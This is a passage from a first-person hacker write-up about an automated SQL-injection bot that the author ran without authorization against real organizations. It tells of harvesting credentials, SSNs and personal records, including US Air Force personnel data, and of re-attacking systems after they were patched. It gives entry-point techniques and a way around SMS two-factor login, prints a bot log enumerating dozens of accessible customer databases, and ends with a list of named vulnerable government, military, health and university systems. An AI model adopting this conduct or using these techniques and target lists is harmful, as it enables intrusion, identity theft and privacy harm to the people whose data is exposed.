the robot manage to find the email records within the penetrated system, but 
can not match them with corresponding passwords values (cannot locate 
related password column by either name or contents matching) or secret 
data - it is useless to him as long as it employs SIDECAM vector only (seeks 
for automated email account breaching).

For an attacker, there is however a different possible area to exploit 
separate email address records, not bound to plaintext passwords: Spear 
Phisihng.
Utilizing SQL Injection attack vector as the first stage of a Spear Phishing 
attack is in fact a book example.

Despite the mechanism to describe the "priority data" pattern (DOP at Bot's 
Segment-2), there was also second pattern-description-mechanism developed 
(at Seg-2) to parametrically define the most crititcal systems (like 
military, gov, financial, health, energy, IT, etc.) within which to search 
vulnerabilities for and to distinguish them from less critical 
infrastructure.




16. Robot Hits His Postgrade Education.
//////////////////////////////////////

Before the next Bot's version, that implemented additional solutions like 
Data Objective Patterns could have been launched it needed a proper training 
of course :)
However it was a month or two already since the last bot's live 
reconnaissance and "hunt" for vulnerable systems, so I've figured out that 
it was a great time to find out how much of database systems initialy 
matched as vulnerable have been already patched (without, obviously, 
noticing the company/organization about the fact of vulnerability existence 
in any formal way).
The first thing I've done was to setup DOP to harvest every 
login/email/password triplet recognized as well as any personal ID data 
(address, phone, DOB, etc.) bound to SSN numbers.
Then I cleared the 'done' flag for the same security / private investigation 
company mentioned earlier (the one the second Bot's version utilized as 
training ground for the automated penetration testing) and launched the 
robot.

Basing on the output data gathered by the previous version of Bot the 
company database held about 30 employee records containing private SSN/ID 
data and few houndred of client records with email/password/login combos, so 
the new bot's automation should have performed successfuly without any human 
supervision, recognizing these data entries as matching against configured 
DOPs, performing an automated data harvest.
But it didn't...
The penetration stopped at the vulnerablility matching procedure - it seemed 
that the company have patched the hole.
Anyway - since an automated code's console printout is not enough to confirm 
if the hole in my favourite security training :) company indeed have been 
patched (I could simply have made ton of bugs in the new bot's code, so it 
could just be malfunctioning) - I needed to check it myself using an 
oldschool script-kiddie ninja techniques. It came out the vulnerable Html 
FORM indeed have been fixed, but since the Bot doesn't have implemented any 
sense-of-humour recognition algorithms (yet...) it obviously missed one 
precious detail of the company's patch.
Previously, if the user would have forgotten his credentials for example, 
the login interface would warn him, using big red font, that "The provided 
password is incorrrect". Now, the fix for the SQLi bug consisted entirely of 
writing an input parsing procedure that checked if the user input data 
contained either 'select' or 'union' SQL words (the words that were SQL 
injected a month ago into the very same database something like 5 times a 
second, for about few days while "training" the bot). The stunning part was 
the coded-in response of ASP programmers for the recognized SQL word 
patterns. After using either "select" or "union" keywords in the 
Login/Password fields, right in the place of common incorrect-password 
warning message, with the same big red font, we were given now a big red:

"GO AWAY!"

Well... I guess if no other automated penetration bot trespassed the 
company's database area last month - it was quite probable that this message 
was meant explicitly for the Bot.

The second, disturbing part of the case was the fix itself. Althought in 
fact the faulty 'customer login' interface has been patched, it took about 
60secs to find another penetration entrypoint - vulnerable 'password 
forgotten' FORM. After redirecting the Bot to the new entrypoint it 
harvested all the DOP configured data successfuly, while taking it to heart 
to "go away" from the 'Customer Login' interface, and to never, ever, use 
this entrypoint again while penetrating this particular system.

Some time later, I did try to analyse a random group of previously 
penetrated and vuln-matched systems selected from the Bot's printouts. It 
seems that approximately 8 out of 10 database systems that 3-6 months 
earlier had been scanned, penetrated and data-harvested either did not fix 
the hole, fixed it inproperly or didn't take an effort of wide-scanning 
whole web app for other similar attack vector vulnerabilities.
Since NONE of the Bot penetrated system owners were ever informed about the 
successful/unsuccessful compromise attempt of their systems, these numbers 
would only indicate that either intrusion detection infrastucture or 
incident response procedures in the penetrated institutions leave a great 
deal to be desired.

A very similar example, to one in security training corp's case, was an 
Australian telecomunication company system providing commercial anonymous 
SMS services. Identified over 6 months earlier as vulnerable by the first 
version of bot and opened for client sensitive information theft as well as 
client SMS credit limit manipulation / SMS service exploitation, it was 
completely rebuilt now (it had that whole new, sharp-looking graphic 
design). Entire web page frontend style was changed and the SQL Injection 
hole within the 'Logon' interface has been properly patched. However, just 
as in the previous case the 'Password Reminder' service was left with the 
very same kind of ASP based SQLi hole that the 'Logon' interface contained 
before, opening back the whole database system for R/W access.

It could only suggest again that the whole attack vector case based on SQL 
Injection may be sometimes either wrongly understood by the web application 
developers, or based too much on shortsighted "how to hack web apps in 
60secs" tutorials (defining methods how to crack a system, not how to 
protect from being cracked), that sometimes could, in fact, be understood in 
the way: "If you secure properly just your ASP web application's LOGON 
interface then you are all secure against any SQL Injection, because ASP SQL 
Injection <IS> just login based".




17. Enumerating Penetration Entrypoints
///////////////////////////////////////

One of main goals of the research was to establish the numbers behind every 
particular victim-pattern, using different, automated, search engine query 
generators. Three generators were constructed, respectively for standard, 
long time exploited 'Login' interface, then 'Forget Password' interface and 
finaly 'User Registration' interface.

The Bot gathered data analysis shows approximately low positive counts 
(target web systems matched as vulnerable) for the plain "login.asp" 
tutorials-case-pattern, higher for patterns like "logon.asp", "log_in.asp", 
"signin.asp", "log_me_in_god_damnit.asp" or their permutations and finaly 
the highest for "register.asp" and "forgotpassword.asp".
The last group - password reminder web interfaces - was for example 
statisticaly the most successful way to compromise a government owned 
database servers.
There seems be at least two main reasons behind these numbers: kind of 
misunderstanding of the nature of common SQL query execution and echo of 
malicious "penetration storms" sweeping through the database systems for the 
past decade.
Well documented algorithms to search and quickly-exploit, like "login.asp" 
googling and infamous "'or 1=1" sequence used as authorization bypass magic 
word, might have been more actively used by script-kiddies and automated 
scanning codes that followed that search pattern. After such 
script-kiddie-conducted attacks (with usually malicious/destructive 
purposes, but lower effort goals) the compromise effects were usually quick 
noticable, rendering a rapid victim's reaction (detection/patching), as the 
impact of the attack was either database contents alteration or destruction. 
Therefore most of the systems following the tutorial-described patterns have 
already their unfriendly pen-testing all behind and so the final positive 
count in that group is statisticaly lower.

You could tell that most of programmers standing behind the systems 
belonging to the critical infrastructure group are perfectly aware of the 
Sqli attack threat as well as of its possible impact to a system. Many of 
those systems that have been found vulnerable to the attack vector had well 
employed validation for almost every submitted data field, having also some 
sort of "scarecrow" for script-kiddies bonus addition, leaving however 
unescaped properly one or two other substantial interfaces that employed a 
client-to-server input flow. These unnoticed connections between the user 
input and server-side command execution, left in different cases the 
particular company's web infrastucture opened to penetration.

A quite funny coincidence happened shortly after the begin of testing of the 
first query generator (the 'login' interface name permutation generator). 
Bot's S1 logged by mistake a YouTube movie link, indicating that it matched 
a '"login.asp"+video' potential HTTP system target pattern. Nothing 
surprising there however, since the movie contained a tutorial to SQL 
Injection driven MSSql server attack. The description of the video added by 
the uploading user contained fraze "login.asp", therfore it has been indexed 
by google robots and found by the Bot. Ironicaly however, the tutorial 
instructed that there is no value in searching for the SQL Injection victim 
to look for any other interfaces that system administration login frontends 
as they are the only possible way to compromise the system. Since we already 
know that the possible remote system SQL command execution may be triggered 
at any server-side user input processing interface, obviously needless to be 
admin-login portal or moreover to be login interface at all - this finding 
of the Bot wasn't afterall a false-positive :)

The second most often place to find command injection vulnerabilities was 
"user registration" interface. Web application programmer needs to implement 
the comparison of the users provided application unique user identificator 
(USERNAME/EMAIL/AgencyID) with the ones already exisiting in DB, and display 
an error message if needed. Since the only possible way to do this is by 
employing an SQL query, another possible entrypoint type was introduced into 
the Bot's code.
A perfect example is one of U.S. Department of Agriculture (USDA) database 
systems with well designed code employing illegal character filtering at 
main login interface - even warning the user about any recognized SQL 
Injection attempt.
But again - the User Registration interface designed for U.S. based 
companies doesn't properly check its User ID field - the server side code 
does not escaped the user's special character input before comparing the 
proposed ID value with the ones already stored in database to check for 
possible repetition - rendering the system exploitable through the attack.

An interesting different type of Sql Injection "pin-point" was spotted by an 
accident during early phase of the research.
First version of the Bot have found a hole in major Polish commercial email 
portal. Few hours after the system has been probed matching it vulnerable by 
Bot's S2 and handed over to penetration worker-queue for further database 
contents scanning and DB structure enumeration, the vulnerabiblity has been 
patched. Unfortunately S2 didn't manage to gather any additional info about 
the database structure and contents, because all its workers were busy at 
the time.
After I've noticed that particular system penetration some time later while 
analysing Bot's few days logs, together with a friend we decided to "check 
out" if the company's programmers didn't miss anything...
After an hour or less my friend noticed (thx Sl4uGh7eR, btw) that 
concatenating an apostroph with the '.asp' file name within the browser URL 
will produce a HTTP 500 error containing our favourite MsSql 0x80040e14 
syntax error. Now the only question remaining was why?
After quick investingation the case became quite clear - the remote server 
application was employing mechanism to validate every client's HTTP file 
request, coding it to match against database stored dynamic list of files 
that a user is allowed to request.
Since such code needs obviously to match the filename requested by a 
particular HTTP/GET against the ones stored within the database - it also 
needs to execute somewhere a proper SQL query command containing client-side 
provided URL string, that unescaped correctly is all the attacker needs.

And so the Bot gained another, third HTTP based SQL Injection pin-point type 
implemented, aside HTTP/POST based Html FORM varialble fuzzing and HTTP/GET 
parameters fuzzing.

But the the cat-mouse play continued. A week after the last friendly 
pentesting the hole has been patched, missing again however the point on the 
issue and enabling an intruder to perform successfuly a Blind Sql Injection 
attack. For this project objectives was obviously not the ravage and server 
take over - just a research, numbers and the attack vector mutation 
possibilities (and lowering also a little my ignorance to SQL language) - 
after implementing new vulnerability testing pinpoint type into the Bot I've 
decided to close the case of the Polish hosting company.

It came back to me, however, quite quickly.

The first bot version which spotted the vulnerable company's system didn't 
have implemented a crucial feature yet - enumeration of every OTHER 
databases (not just the one that has been queried by the vulnerable ASP 
script code) hosted at the DB server that could be accessed through the 
vulnerable web interface.
The feature was implemented later in the last major Bot's version. During 
the final month-long runtime it spotted a minor vulnerable website's 
database, provided for Polish barbers industry. After enumerating all the 
other accessible databases on that vulnerable MSSQL server using same 
db-user account as for the barbers portal login interface, amazingly, it 
came out that the server is the VERY SAME db-server belonging to the 
previous major Polish hosting company, hosting 94 other R/W accessible 
databases, including for example the biggest Polish international cycling 
racing event website - "Tour De Pologne".
Since all the server hosted databases were aministrated and serviced by that 
single hosting company, all of them were protected by the SAME db-user 
account, rendering R/W accessible every database hosted there through that 
single minor barber portal - including WWW/FTP customer account credential 
database, company financial operations database (customer credit card data), 
and so on.

It should be also mentioned - even if its too obvious - that SQL Injection 
vector attack does not have to be even HTTP protocol based. Vulnerability 
could be exploited connecting at any kind of user data entrypoint (protocol) 
designed to transport the input to the remote client/server application for 
final processing. No matter what happens, implementing proper 'processing' 
of that input at server's side is the key to stay secure or to get 
compromised in future.





18. Obscurity != Security
/////////////////////////

"If it runs, it can be broken" - every software protection cracker's 
favourite fraze. It's quite simple actually - every locally runnable code is 
reverse-engineerable and can be re-sculpted into anything else, limiting the 
possibilities just to cracker's imagination.

The same rules applies to client-side-only web app protections and code 
obfuscation.

Interesting observation was made during the bot's runtime and afterwards - 
analysing the vulnerable system entrypoints list. It seems that many of 
heavier client-side protected web applications that has been in turn matched 
as penetrable by the bot were either a government or military systems. And 
to be clear: by "heavier" I meant here approximately higher ammount and 
sophistication level for the code responsible for the CLIENT SIDE user input 
validation.

For example, the second version of bot found and penetrated quite old but 
still operational DoD owned system belonging to one of US Air Force 
contrators - Lockhead Martin.The JScript code there employed really annoying 
for an attacker, timer-based input validation protection. "Annoying" of 
course for a human attacker with browser scripting turned on... :)
To try to disable the input validation timers manualy, using just for 
example FireFox FireBug plugin would be a real pain in the ass, as the timer 
validation procedures were embeded into different HTML tags and 
cross-triggered each other causing the loss of FF's input focus after every 
inproper character pressed (btw: huge applause for their programmers 
imagination).
>>From the bot's perspective however (ie: from its "handicapped" 
robot-perspective), the whole JS code built by the system's programmers is 
pretty irrelevant - just as the bot doesn't employ any JS engine to execute 
the retrieved HTML scripts searching directly in the HTML and its subframes 
for every submitable FORM tag - this validation code was simply an excessive 
piece of HTML encoded text. After matching the system as positive against 
SQL Injection, the bot built and stored the penetration entrypoint 
description. Right after that, S2 successfuly penetrated it and dumped about 
3K Email/Pwd/SSN record entries of US AirForce cadets and officers.

Every client side software protection providing input data validation can be 
reversed and disabled.
Thus, the input filtering on the server side IS A MUST to be implemented in 
any secure web app. Employing client-side FORM field data validation in 
search for invalid characters - has no bigger value as a security mechanism. 
Obviously, it serves very well as data syntax validity double check 
mechanism as well as the first line of defense from annoying script-kiddies 
(like me for example:) typing one magic injection word into every queried 
google link looking for a single-hit "world domination" internet doors. 
Using tools built for browser-side session data manipulation, like FireBug 
plugin for FF or WebScarab http-proxy tool, one can quickly bypass 
protections of this kind. Specifically, automated internet robots, using own 
HTTP-payload processing, can do with the client side script code pretty 
anything that bot's programmer wished them to do - ranging from validation 
code autodetection up to selective execution.

On the other hand, one good way to stop a fully automated robot 
(vulnerability probing robot) on his web-app crawling/scanning road would be 
captcha implementation. Robot code behaves as blindfolded as only a machine 
can. Of course business-time counsuming implementation of additional anti 
robot functionality like this without focus on true bottom of the issue, ie. 
the application security assessment, would be shortsighted. Obviously, while 
captcha won't stop any human auditor conducting precise web-app pentesting 
ordered by a customer company, it will definitely stop a robot from either 
full enumeration of the web-app interface or progression with specific 
interface fuzzing process.

Another interesting, yet still powerless protection facing an SQL Injection 
vulnerability was an SMS based 2-factor web authentication solution, 
implemented by one of Johanessburg based Colleges, which handled parent 
authentication logon to the child education progress monitoring system.
Bot in its early second version tracked down the vulnerability, accessing 
without any trouble sensitive ID data belonging to both students as well as 
their parents (email/password combos, names, phones). Despiting a certain 
threat of ID theft and mailbox hijacking by criminals, the SQL Injection can 
be used here in a quicker way to manipulate the SMS phone number records to 
gain unathorized access to the system.
The authentication implemented there had two steps.
At the first one parent was asked to provide its Parent_Code, ID_Number, 
Email_Address and Password. Then, using the database stored (at 
registration) phone number, server-side application sent a special security 
code on that phone number and asked the user to enter the code at the second 
logon screen, before giving him the access to the monitoring services. 
Exploiting however the R/W access to a database records, a malicious entity 
can easily change any particular parent phone number to the desired one, 
redirecting in result the SMS containing the Security Code.



19. Learning new tricks from your own code
//////////////////////////////////////////

Shortly before the end of the final Bot's testing month, during some early 
october morning it found an entrypoint into the vulnerable HP customer 
support web database. Since the tool was running silently without my 
supervision (the time of the initial system's vulnerability match followed 
by an automated penetration was something like 4AM here in my country, while 
I was sleeping deliciously), over a week has passed until I've decided to 
look over the recent data gathered by the Bot.

When I've spotted the HP penetrated system's printout in tool's output logs 
my attention was attracted by the list of databases stored on that DB 
server. It contained Intel's, Amd's, HP's as well as about 20 other "bigger" 
company customer databases. It seemed that the server belonged to some IT 
outsourcing company which offered its customers DB-Server hosting services.
Unfortunately all I've had before me was the server's sub databases name 
list and its structure - it seemed that the Bot didn't recognized any 
potentialy "interesting" (DOP specified) data on the server (at the time it 
was configured to look only for login/email/password combos) so it did not 
"decide" to perform further data-harvest. Still, after quick human analysis, 
it seemed that some of the accessible databases contained tables with column 
names suggesting sensitive customer information. Obviously I must have done 
a quick "manual" check to be sure :)

Launching web browser -> copy-pasting vulnerable system URL -> entering 
manualy SQL query sequence into the input field enumerated earlier by the 
Bot and ... here goes nothing. Ehmmm.
Has the system been patched already?

Well. Uhmmmmmm. OK.
Good for them.
The guys did their job well and patched the system after noticing Bot's 
friendly "pentesting visit" last week.
So I thought...
First of all you must agree that the teaching-dependency-line linking the 
programmer with his penetration testing robot is rather unidirectional :)
I mean, it is the coders duty to learn the code enough tricks he know in 
order to create automated attack robot. In other words - the vulnerability 
recognition errors are meant to be more like domain of machine - not the 
human. So if you code a program telling him how to enumarate and penetrate 
the system, then the code finds a system and says - "I've matched an 
entrypoint to the database at web interface X" - and some time later you try 
to access the database manualy at the very same entrypoint specified by the 
code but nothing happens...  the answer is obvious: the system has been 
patched. Right ?
In other words: it couldn't have been you - the teacher - who made a mistake 
validating the entrypoint's security, while all the tricks the code knows 
are your tricks ... :)
But that was a system hosting databases of Intel, Amd and Cisco...
I mean, you just have to be sure to sleep well, if they didn't fix just one 
particular entrypoint leaving another one unpatched. Quick checking all the 
other input fields, password reminder interface, sumbmit new account 
interface, website search interface - nope. Nothing. The vuln has been 
fixed.

So the last thing (but you could say - completely unnecessary - basing on 
what has been said earlier) was to order the bot to target the system again 
and repeat the penetration test from a week before. So, we launch the 
config, clear the "pen-test-done" flag by the systems url entry and wake the 
Bot.

20091128125443 Initializing Ellipse 0.4.73 SEG-2
20091128125443 Cleaning up abandoned VlnConn targets...
20091128125505 Op mode: 0
20091128125505 Mutex ID: VLNDET-MTX-001
20091128125505 Entering MainLoop...
20091128125525
20091128125525 [ SYSTCH ] Connecting system at >>
20091128125525 [ SYSTCH ]    http://xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
20091128125525
20091128125528 [ SEG2 ] Initializing Entrypoint Search...
20091128125528 [ SEG2 ] Entrypoint #1 found
20091128125528 [ VLNCONN ] Going processing level: 0x20
20091128125528 [ VLNCONN ] Running initial passive vuln detection...
20091128125534 [ VLNCONN ] Passive-Scan result: Negative
20091128125534 [ SEG2 ] Entrypoint #2 found
20091128125534 [ VLNCONN ] Running initial passive vuln detection...
20091128125538 [ VLNCONN ] Passive-Scan result: POSITIVE
20091128125538 [ VLNCONN ] Going processing level: 0x21
20091128125538 [ VLNCONN ] Running active vuln detection...
20091128125543 [ VLNCONN ] Scan result: POSITIVE
20091128125543 [ VLNCONN ] Going processing level: 0x25
20091128125543 [ VLNCONN ] Running primary query element scan...
20091128125543 [ VLNCONN ] BaseQuery column extracted: 
hp_support_reg_AU.sPassword
20091128125556 [ VLNCONN ] Going processing level: 0x26
20091128125556 [ VLNCONN ] Validating query item count...
20091128125556 [ VLNCONN ] Validation Succeeded
20091128125556 [ VLNCONN ] Validating Mode2DatAccess...
20091128125557 [ VLNCONN ] Mode2DatAccess Enabled
20091128125557 [ VLNCONN ] Going processing level: 0x3A
20091128125557 [ VLNCONN ] Scanning global DB Names ...
20091128125557 [ VLNCONN ] DB #000: hp
20091128125558 [ VLNCONN ]          Accessible
20091128125558 [ VLNCONN ] DB #001: master
20091128125558 [ VLNCONN ]          Accessible
20091128125559 [ VLNCONN ] DB #002: tempdb
20091128125559 [ VLNCONN ]          Accessible
20091128125600 [ VLNCONN ] DB #003: model
20091128125600 [ VLNCONN ]          Accessible
20091128125601 [ VLNCONN ] DB #004: msdb
20091128125602 [ VLNCONN ]          Accessible
20091128125602 [ VLNCONN ] DB #005: pubs
20091128125602 [ VLNCONN ]          Accessible
20091128125603 [ VLNCONN ] DB #006: Northwind
20091128125603 [ VLNCONN ]          Accessible
20091128125604 [ VLNCONN ] DB #007: intel_collateral
20091128125604 [ VLNCONN ]          Accessible
20091128125605 [ VLNCONN ] DB #008: vishay
20091128125605 [ VLNCONN ]          Accessible
20091128125605 [ VLNCONN ] DB #009: milieu
20091128125606 [ VLNCONN ]          Accessible
20091128125607 [ VLNCONN ] DB #010: seagate
20091128125608 [ VLNCONN ]          Accessible
20091128125608 [ VLNCONN ] DB #011: dbSanDisk
20091128125608 [ VLNCONN ]          Accessible
20091128125609 [ VLNCONN ] DB #012: hp
20091128125610 [ VLNCONN ]          Accessible
20091128125610 [ VLNCONN ] DB #013: dbInFocus
20091128125612 [ VLNCONN ]          Accessible
20091128125612 [ VLNCONN ] DB #014: intel
20091128125613 [ VLNCONN ]          Accessible
20091128125613 [ VLNCONN ] DB #015: BMC
20091128125614 [ VLNCONN ]          Accessible
20091128125614 [ VLNCONN ] DB #016: dbInFocusPP
20091128125614 [ VLNCONN ]          Accessible
20091128125615 [ VLNCONN ] DB #017: dbInFocusSC
20091128125615 [ VLNCONN ]          Accessible
20091128125616 [ VLNCONN ] DB #018: snc
20091128125619 [ VLNCONN ]          Accessible
20091128125619 [ VLNCONN ] DB #019: SANDISK_POP
20091128125620 [ VLNCONN ]          Accessible
20091128125620 [ VLNCONN ] DB #020: dbIntel
20091128125620 [ VLNCONN ]          Accessible
20091128125621 [ VLNCONN ] DB #021: Nokia
20091128125621 [ VLNCONN ]          Accessible
20091128125622 [ VLNCONN ] DB #022: dbShowcase
20091128125623 [ VLNCONN ]          Accessible
20091128125624 [ VLNCONN ] DB #023: dbPMG
20091128125624 [ VLNCONN ]          Accessible
20091128125625 [ VLNCONN ] DB #024: AMD
20091128125625 [ VLNCONN ]          Accessible
20091128125625 [ VLNCONN ] DB #025: Purina
20091128125627 [ VLNCONN ]          Accessible
20091128125627 [ VLNCONN ] DB #026: AMD_TEST
20091128125628 [ VLNCONN ]          Accessible
20091128125628 [ VLNCONN ] DB #027: TEST_dbInFocusSC
20091128125629 [ VLNCONN ]          Accessible
20091128125629 [ VLNCONN ] DB #028: TEST_InFocus
20091128125630 [ VLNCONN ]          Accessible
20091128125631 [ VLNCONN ] DB #029: STB
20091128125631 [ VLNCONN ]          Accessible
20091128125631 [ VLNCONN ] DB #030: BackupAwareness
20091128125632 [ VLNCONN ]          Accessible
20091128125632 [ VLNCONN ] DB #031: nvpc
20091128125633 [ VLNCONN ]          Accessible
20091128125633 [ VLNCONN ] DB #032: dbCisco
20091128125634 [ VLNCONN ]          Accessible
20091128125634 [ VLNCONN ] DB #033: tUserLogin_bak161105
20091128125635 [ VLNCONN ]          Accessible
20091128125635 [ VLNCONN ] DB #034: jackson
20091128125635 [ VLNCONN ]          Accessible
20091128125636 [ VLNCONN ] DB #035: Michelin
20091128125639 [ VLNCONN ]          Accessible
20091128125640 [ VLNCONN ] DB #036: dbMcAfee
20091128125640 [ VLNCONN ]          Accessible
20091128125641 [ VLNCONN ] DB #037: PMG_VA
20091128125641 [ VLNCONN ]          Accessible
20091128125641 [ VLNCONN ] DB #038: MCSoptimizer
20091128125642 [ VLNCONN ]          Accessible
20091128125642 [ VLNCONN ] DB #039: Maxtor
20091128125643 [ VLNCONN ]          Accessible
20091128125644 [ VLNCONN ] DB #040: Xtentia
20091128125645 [ VLNCONN ]          Accessible
20091128125645 [ VLNCONN ] DB #041: NokiaLetsNetwork
20091128125646 [ VLNCONN ]          Accessible
20091128125646 [ VLNCONN ] DB #042: Print_Optimizer
20091128125646 [ VLNCONN ]          Accessible
20091128125647 [ VLNCONN ] DB #043: GiftShop
20091128125647 [ VLNCONN ]          Accessible
20091128125648 [ VLNCONN ] DB #044: GiftShop_en
20091128125648 [ VLNCONN ]          Accessible
20091128125648 [ VLNCONN ] DB #045: dbOrderingTool
20091128125649 [ VLNCONN ]          Accessible
20091128125649 [ VLNCONN ] DB #046: SingHealth
20091128125650 [ VLNCONN ]          Accessible
20091128125650 [ VLNCONN ] DB #047: Watson_Wyatt
20091128125651 [ VLNCONN ]          Accessible
20091128125651 [ VLNCONN ] DB #048: VATest
20091128125652 [ VLNCONN ]          Accessible
20091128125652 [ VLNCONN ] DB #049: seagate_sdvr
20091128125653 [ VLNCONN ]          Accessible
20091128125653 [ VLNCONN ] DB #050: HM
20091128125653 [ VLNCONN ]          Accessible
20091128125654 [ VLNCONN ] DB #051: dbVirtualAgency
20091128125654 [ VLNCONN ]          Accessible
20091128125655 [ VLNCONN ] DB #052: Seagate_Xmas
20091128125655 [ VLNCONN ]          Accessible
20091128125657 [ VLNCONN ] DB #053: Seagate_CNY
20091128125657 [ VLNCONN ]          Accessible
20091128125658 [ VLNCONN ] DB #054: SeagateCM2
20091128125658 [ VLNCONN ]          Accessible
20091128125658 [ VLNCONN ] DB #055: SeagateSecuTecheInvite
20091128125659 [ VLNCONN ]          Accessible
20091128125659 [ VLNCONN ] DB #056: ICG
20091128125700 [ VLNCONN ]          Accessible
20091128125700 [ VLNCONN ] DB #057: SeagateCM2_China
20091128125701 [ VLNCONN ]          Accessible
20091128125701 [ VLNCONN ] DB #058: IntelServerConfig
20091128125702 [ VLNCONN ]          Accessible
20091128125702 [ VLNCONN ] DB #059: SeagateCM2_Korea
20091128125703 [ VLNCONN ]          Accessible
20091128125704 [ VLNCONN ] DB #060: IntelServerConfigTest
20091128125704 [ VLNCONN ]          Accessible
20091128125705 [ VLNCONN ] DB #061: SeagateCM2_Taiwan
20091128125705 [ VLNCONN ]          Accessible
20091128125706 [ VLNCONN ] DB #062: SeagateCMS
20091128125706 [ VLNCONN ]          Accessible
20091128125707 [ VLNCONN ] DB #063: dbNSNCafe
20091128125707 [ VLNCONN ]          Accessible
20091128125707 [ VLNCONN ] DB #064: SCMS_XDB
20091128125708 [ VLNCONN ]          Accessible
20091128125708 [ VLNCONN ] DB #065: SCMS_AU
20091128125709 [ VLNCONN ]          Accessible
20091128125710 [ VLNCONN ] Scan done -> 66 total DBs found
20091128125710 [ VLNCONN ]              59 accessible DBs found
20091128125710 [ SEG2 ] Vuln Connection Done.


Well...
Uhmmm....
Ok.

What the F**K is going on...

Bringing back FF, locating manualy the 2nd entrypoint specified in the Bot's 
logs and ... It seems that it's "Forgotten Password" interface - the very 
same FORM that the Code penetrated the system through before. Manual 
injection -> not a single MSSQL error. Maybe it's within some hidden text 
area or in background color - anything that I could have missed.
Nope.
The HTML source is clear. Not a single ASP db-error string.

Now, this is the moment I guess a programmer lives for :)
To feel weak and stupid in front of the code you have just written.
It seems that afterall one can learn a new tricks from his own code. After 
quick debugging session and watching the code as it runs through the 
vulnerability matching steps the case was solved.

The reason behind that the code could have successfuly penetrated the system 
and I couldn't was the Bot's bug (oh yeah...) that I left while coding the 
bot's HTML parser. The parser implementation I adopted from one of my 
previous projects (the Ogame robot) did not have the rule to evade properly 
any HTML code within escapement seqences. Actually, it was coded in, but the 
minor true/false logic bug prevented it from execution.
The vulnerable "forgotten password" FORM was indeed vulnerable. But not the 
one rendered by the browser.
The one tracked and targeted by the code was also a "forgotten password" 
interface but it had a different FORM's 'action' URL-path parameter and lay 
entirely within one of the HTML commented areas. It seems that some web 
programmer with really sharp sense of humour patched that earlier vulnerable 
interface, gave it a new 'action' param path leading to a new secure code 
interface but not only didn't remove the other vulnerable interface from the 
server side ASP code but also left the old vulnerable FORM leading directly 
to the remote interface just commented within the HTML code.

Anyway. A buggy bot code, helped the penetration S2 code to find completely 
different application's bug.
You simply LIVE FOR these tiny, ironic moments.






20. SIDECAM Robots vs. Honeypots And Attack Vector Recognition
//////////////////////////////////////////////////////////////

Every time an attack vector evolve one can design and implement a proper 
diversion/IDS facility - a honeypot.
Now, since I was focused in general on ID theft attack scenario driven by 
SQL Injection based mailbox credential matching, one could construct a 
solution trained to recognize such attack in progress, track its propagation 
and with some luck tell us something more about the remote entity, that 
originated the attack and/or actively exploits the stolen data.
For a specialized, SIDECAM-bot autodetection framework we would need at 
first to spread the smell of honey far away, ie. to be highly visible for 
automated google-driven target seekers.
A proper positioning combined with building in most common SQL Injection 
entrypoint patterns (lets narrow it down just to ASP for now) - like the 
unfamous "login.asp" scheme for example, plus certain "data sensitivity 
flavour" to taste good (lest say something more critical than a sperm-bank 
customer database) - that should do the trick.
When attracted to our phony target, the attackers S2-equivalent code should 
find easily the email/password record entries crafted and left there by us. 
These mail accounts prepared specialy for the attack IDing purposes could 
then be robot-monitored by the honeypot framework - any valid mailbox 
credential login will indicate a SIDECAM attack vector exploitation in 
progress.





21. Compromised
///////////////

The list below contains selected, non-detailed, most critical vulnerable 
institutions' systems, identified by the Bot during whole research, in some 
cases opening penetration paths to several different organizations / 
companies systems.
Some of them might have been patched since the initial vulnerability match, 
some might have been shutted down.
>>From the reasons that have been mentioned in the first paragraph, neither 
links nor any further details will be disclosed publicly.


Vulnerable educational organization systems:

- University of the South Carolina, (multiple entrypoints)
- Bulgarian Svishtov Economic University,
- Cracow Jagiellonian University, medical sciences department system
- California State University, student health web service
- University of Washington,
- University of Minnesota,
- Truman State University, (multiple entrypoints)
- Hunter College,
- Dallas Baptist University, graduate admissions system
- University of Arkansas for Medical Sciences
- Association for Information Systems database


Vulnerable government institution systems:

- Argentina Ministry of Foreign Affairs system,
- UK Vehicle Certification Agency system,
- UK Vehicle & Operator Services Agency system,
- Arizona Department of Transportation system,
- California Department of General Services, Online Fiscal Services system
- California Department of Education system,
- California Tax Education Council system,
- California Department of Justice (3 separate systems)
- Florida Department of Financial services system
- Colorado Department of Personnel and Administration system
- Maryland Information Technology Advisory Council system,
- District of Columbia Public Service Commission (multiple penetration 
entrypoints)
- Arizona Information Technology Agency system,
- U.S. Department of Transportation maritime service system,
- Texas Department of Justice system,
- Federal Mediation & Conciliation Service,
- Alberta (Canada) Advanced Education and Technology service,
- Georgia gov-job portal database,
- Georgia Financing and Investment Commission system,
- City of Grove City (Ohio), contractor application database,
- Geary County (Kansas) Gov Taxing web serivce,
- Sarpy County (Nebraska),
- Sawyer County, electronic taxing / land administration web system,
- Fauquier County (Virginia), county's goverment eNotification system,
- San Bernardino County web system, Purchasing Department Administration 
system,


Vulnerable US Department of Defense systems (including contractors and 
subcontractors):

- Rock Island Arsenal U.S. Army database system,
- U.S. National Defense University system,
- Jacobs Dougway (DoD and NASA contrator) performance and reporting system,
- DoD Severely Injured Service Member system,
- DoD Health Services Evaluation system,
- DoD troops civil carrer database ("Troops To Teach"),
- Lockheed Martin, (multiple entrypoints),
- U.S. Defense Logistics Agency system - defense fuel energy services 
system,


Vulnerable Financial institution systems:

- International Monetary Fund system
- U.S. National Association of Corporate Directors system,
- American Economic Association system,
- Global Banking "employer only" job board web system,
- Employee Stock Ownership Plan database,
- Mortage Bankers Assoc of New York system,
- American Society for Training & Development system,
- International Fund Research Corporation database,
- numerous financial advisory companies and institutions


Vulnerable security companies and organizations:

- US based international security / law enforcement / private investigation 
company
- Private Investigators Portals database,
- Private detective, crime, security and software community portal database,
- Retired military officers job portal, entrypoint gives R/W access to other 
800+ databases,
- Associated Security Proffesinals (ASP) system


Vulnerable aviation and space systems:

- German Aerospace Center subsystem,
- International aerospace company providing equipment and airline 
information services,
- Canadian airline ticket centre system,
- Air Traffic Control Global Events, air traffic security conferences 
database system


Vulnerable health organizations systems:

- US Department Of Health, Disaster (hurricane) response online service,
- US Department of Health and Human Services University, learning platform 
participant database,
- US Center for Disease Control and Prevention (CDC),
- National Association of Clean Water Agencies / Water Enviroment Research 
Foundation jointventure
- International company providing validation services for pharmaceutical, 
biotechnolgy and medical device industries,
- US Nationswide Drug Testing Services Company,
- French Association of AntiAge and Estetique Medicine,
- International health recruitment database,
- Cleveland Clinic Center for Continuing Education,


Miscleneaous vulnerable systems:

